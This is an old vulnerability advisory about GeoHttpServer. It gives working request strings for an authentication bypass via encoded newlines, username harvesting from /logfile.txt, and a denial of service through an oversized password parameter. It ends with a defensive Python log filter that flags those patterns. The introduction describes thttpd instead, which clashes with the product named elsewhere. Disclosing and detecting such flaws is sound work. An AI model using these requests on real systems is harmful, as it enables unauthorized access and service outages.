GeoHttpServer Authentication Bypass Vulnerability & Denial Of Service Vulnerability
23 January 2004
From: "Rafel Ivgi, The-Insider" <theinsider(at)012.net.il>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Software: GeoHttpServer
Vendor: GEOVISION INC
http://www.geovision.com.tw
Versions: ALL
Platforms: Unix
Bug: Authentication Bypass Vulnerability & D.O.S (Denial Of Service)
Risk: High
Exploitation: Remote with browser
Date: 22 Jan 2004
Author: Rafel Ivgi, The-Insider
e-mail: the_insider@mail.com
web: http://theinsider.deep-ice.com

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1) Introduction
2) Bug
3) The Code

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===============
1) Introduction
===============

thttpd is a free "Open Source" webserver that comes by default with Unix systems such as FreeBSD and Linux.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

======
2) Bug
======

The GeoHttpServer security is pretty good. Some users, who understand what they are doing, configure the server to authenticate login attempts.

The server uses this authentication code:
**********************************************
<html><head><title>Login In</title>
</head><body><center>
<form method="POST" action="phoneinfo">User Name:</BR>
<input type="id" name="id" size="10"><p></p>
Password:</BR>
<input type="password" name="pwd" size="10">
<p><input type="radio" name="ImageType" value="1" checked>JPEG&nbsp;
<input type="radio" name="ImageType" value="2">GIF</p>
<p><input type="submit" name="send" value="Submit"><input type="reset"
name="CANCEL" value="Cancel"></center><center>

</p>
</form>
</center>
</body>
</html>
**********************************************

Amazingly, http://<host>/%0a%0a bypasses it!
You get the GeoHttpServer default main page.
The main page leads to functions that also require authentication. In order to retrieve a user name we can go to http://<host>/logfile.txt, which generally contains the last logins and usernames.
In most cases the password will be the same as the user name.
In addition, there is an authentication form inside the server that requires a name and a password in order to see the server info/config.
Manipulating these links can cause a denial of service of the server.

P.O.C(Proof Of Concept):
http://<GeoHttpServerhost>/sysinfo?id=TheInsider&pwd=killedaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

Another D.O.S caused by the server is an Internet Explorer D.O.S: when someone is watching a video stream from the server and presses the reconnect button, I.E has an overflow.
Internet Explorer Version: 6.0.2600.0
Module Stuck: msxml3.dll
Module Version: 8.20.9415.0
Offset: 00013ed6

http://theinsider.deep-ice.com/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===========
3) The Code
===========

Authentication Bypass - http://<host>/%0a%0a bypasses it!
Denial Of Service -
http://<GeoHttpServerhost>/sysinfo?id=TheInsider&pwd=killedaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
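
Added example (not part of the original advisory or of GeoHttpServer): a small access-log filter that flags the three request patterns described above, namely encoded newlines in the path, retrieval of /logfile.txt, and oversized query parameters. The log format, the sample lines and the 64-character threshold are assumptions made for the illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (common log format); clients and times are made up.
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Jan/2004:10:00:01 +0000] "GET /%0a%0a HTTP/1.0" 200 512',
    '192.0.2.10 - - [22/Jan/2004:10:00:05 +0000] "GET /logfile.txt HTTP/1.0" 200 2048',
    '192.0.2.11 - - [22/Jan/2004:10:01:00 +0000] "GET /sysinfo?id=x&pwd=' + "a" * 500 + ' HTTP/1.0" 200 0',
    '192.0.2.12 - - [22/Jan/2004:10:02:00 +0000] "GET /sysinfo?id=admin&pwd=secret HTTP/1.0" 200 900',
    '192.0.2.12 - - [22/Jan/2004:10:02:09 +0000] "POST /phoneinfo HTTP/1.0" 200 700',
]

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) [^"]*"')
ENCODED_NEWLINE_RE = re.compile(r"%0[ad]", re.IGNORECASE)
MAX_PARAM_LEN = 64  # assumed threshold; tune it for the deployment


def classify(line):
    """Return (client, [findings]) for one log line, or None if unparseable."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, target = m.groups()
    parts = urlsplit(target)
    findings = []
    # Inspect the raw, still percent-encoded path: the bypass request is /%0a%0a.
    if ENCODED_NEWLINE_RE.search(parts.path):
        findings.append("encoded-newline-in-path")
    # The advisory notes that logfile.txt exposes recent logins and usernames.
    if parts.path.lower() == "/logfile.txt":
        findings.append("logfile-access")
    # The denial of service uses a very long pwd value; flag any oversized parameter.
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if any(len(v) > MAX_PARAM_LEN for v in values):
            findings.append("oversized-param:" + name)
    return client, findings


def scan(lines):
    """Return (client, findings) for lines matching at least one indicator."""
    results = (classify(line) for line in lines)
    return [r for r in results if r and r[1]]


if __name__ == "__main__":
    for client, findings in scan(SAMPLE_LOG):
        print(client, ", ".join(findings))
```
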

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com

